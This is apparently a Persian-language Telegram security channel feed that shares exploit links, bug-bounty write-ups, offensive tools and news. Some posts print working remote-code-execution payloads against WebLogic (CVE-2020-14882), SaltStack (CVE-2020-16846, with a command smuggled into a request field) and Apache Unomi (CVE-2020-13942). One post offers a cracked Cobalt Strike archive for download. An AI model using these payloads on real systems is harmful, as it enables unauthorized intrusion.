امنیت اطلاعات

آسیب پذیری RCE در weblogic بدون نیاز به احراز هویت CVE-2020–14882 https://x.x.x.x:7001/console/images/%252E%252E%252Fconsole.portal POST: _nfpb=true&_pageLabel=&handle=https://com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime(…

https://github.com/jas502n/CVE-2020-14882

CVE-2020–14882

#weblogic
#rce
#java

@sec_nerd

GitHub

GitHub - jas502n/CVE-2020-14882: CVE-2020–14882、CVE-2020–14883

CVE-2020–14882、CVE-2020–14883. Contribute to jas502n/CVE-2020-14882 development by creating an account on GitHub.

1.63K views16:53

امنیت اطلاعات

استخراج اطلاعات از اسناد با sammler

https://github.com/redcode-labs/sammler

#misc
#meta

@sec_nerd

1.05K views15:19

امنیت اطلاعات

اکسپلویت آسیب پذیری لو دادن اطلاعات در sharepoint مایکروسافت

CVE: CVE-2020-17017

https://srcincite.io/pocs/cve-2020-17017.py.txt

#sharepoint
#windows

@sec_nerd

806 views18:32

امنیت اطلاعات

برنامه نویس سابق مایکروسافت به ۹ سال حبس محکوم شد!
ولودیمیر کواشوک ۲۶ ساله که اهل اوکراین است از سال ۲۰۱۶ بعنوان یک برنامه نویس تمام وقت با مایکروسافت کار خود را شروع کرد و در سال ۲۰۱۸ این همکاری به پایان رسید.
او در طی این مدت در پروژه ی فروش آنلاین مایکروسافت مشغول به فعالیت بود که با سوء استفاده از دسترسی خود اقدام به دزدیدن CSV (چیزی شبیه به گیفت کارت) نمود.
در ابتدا او با دزدی مقادیر اندک کار خود را ادامه داد و تا ۱۲ هزار دلار از این طریق بدست آورد اما پس از آن به این مقدار اکتفا نکرد و دست به دزدی میلیون دلاری زد.
کواشوک در نهایت مقدار 2.8 میلیون دلار به سرقت برد. حالا او باید 8.34 میلیون دلار جریمه بپردازد و با ۱۸ عنوان اتهامی ۹ سال را در زندان بگذراند.

https://www.darkreading.com/attacks-breaches/former-microsoft-software-engineer-sentenced-to-9-years-in-prison/d/d-id/1339422

#news
#microsoft

@sec_nerd

Dark Reading

Former Microsoft Software Engineer Sentenced to 9 Years in Prison

The 26-year-old was convicted earlier this year of wire fraud, money laundering, and filing false tax returns, among other charges.

👍1

848 views19:00

امنیت اطلاعات

نسخه چهارم ابزار معروف پسانفوذ cobalt strike دیکامپایل و بصورت متن باز و کرک شده در اختیار عموم قرار گرفت
https://www.bleepingcomputer.com/news/security/alleged-source-code-of-cobalt-strike-toolkit-shared-online/

سورس کد منتشر شده، سورس اصلی این ابزار نیست

کامنت کردن یک خط از کد برای کرک شدن آن کفایت میکند!

https://twitter.com/0xAmit/status/1326648804582563841

#tools
#post_exploitation

@sec_nerd

1.15K views07:10

امنیت اطلاعات

CobaltStrike-master.zip

17.5 MB

1.33K views07:11

امنیت اطلاعات

اکسپلویت آسیب پذیری saltstack

CVE-2020-16846

PoC：

POST /run HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0
Accept: application/x-yaml
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 87

token=12312&client=ssh&tgt=pyn3rd&fun=a&roster=qwe&ssh_priv=aaa%26%20open%20-a%20Calculator

#rce
#saltstack

@sec_nerd

745 views11:28

امنیت اطلاعات

رایت آپ کشف باگ ssrf به ارزش ۳۱ هزار دلار در سرویس مانیتورینگ ابر گوگل

https://nechudav.blogspot.com/2020/11/31k-ssrf-in-google-cloud-monitoring.html

#bugbounty
#google
#ssrf

@sec_nerd

798 views15:37

امنیت اطلاعات

رایت آپ کشف باگ در مسنجر فیسبوک که منجر به لو دادن اکسس توکن های میلیونها کاربر میشود

https://medium.com/@guhanraja/how-i-found-the-facebook-messenger-leaking-access-token-of-million-users-8ee4b3f1e5e3

#bugbounty
#writeup
#facebook

@sec_nerd

908 views15:39

امنیت اطلاعات

شناسایی و بروت فورس حسابهای active directory با kerbrute

https://github.com/ropnop/kerbrute

#AD
#windows
#privesc

@sec_nerd

GitHub

GitHub - ropnop/kerbrute: A tool to perform Kerberos pre-auth bruteforcing

A tool to perform Kerberos pre-auth bruteforcing. Contribute to ropnop/kerbrute development by creating an account on GitHub.

990 views08:26

امنیت اطلاعات

https://www.linuxfx.org/

#linux
#windows

@sec_nerd

672 views17:52

امنیت اطلاعات

ترکیب سه آسیب پذیری برای تصاحب اکانت

SSRF-->Cloudflare bypass--> Rate limiting to account takeover.

https://medium.com/@logicbomb_1/tale-of-3-vulnerabilities-to-account-takeover-44ba631a0304

#writeup
#ssrf

@sec_nerd

1.01K views17:57

امنیت اطلاعات

This media is not supported in your browser

VIEW IN TELEGRAM

باگ RCE در Apache Unomi

CVE-2020-13942

PoC:
{"filters":[{"id" : "pyn3rd","filters": [{"condition": {"parameterValues": {"pyn3rd": "script::Runtime.getRuntime().exec('open -a Calculator')"},"type":"profilePropertyCondition"}}]}],"sessionId": "pyn3rd"}

#apache
#rce

@sec_nerd

695 views16:47

امنیت اطلاعات

دور زدن محدودیت های redirect با هفت روش

https://elmahdi.tistory.com/4

#openredirect
#bugbounty
#pentest

@sec_nerd

ElMahdi - マハディ

Bypassing the Redirect filters with 7 ways

Hello Bug Bounty Hunters, In this writeup I will be explaining various scenarios on how to bypass Open Redirect Filters that will lead to Open Redirect> ATO [0x01] Bypass the OAUTH Protection Via Path-URI Open redirect: I already reported a report about simple…

735 views16:50

امنیت اطلاعات

یک منبع مناسب برای تهیه wordlist با هدفهای متنوع

https://wordlists.assetnote.io/

#wordlist
#fuzz
#pentest

@sec_nerd

807 views16:53

امنیت اطلاعات

یک رساله دکترا در خصوص تولید اکسپلویت

Greybox Automatic Exploit Generation for Heap Overflows in Language Interpreters

https://seanhn.files.wordpress.com/2020/11/heelan_phd_thesis.pdf

توضیحات مختصر

https://sean.heelan.io/2020/11/18/phd-thesis-greybox-automatic-exploit-generation-for-heap-overflows-in-language-interpreters/

#overflow
#exploit

@sec_nerd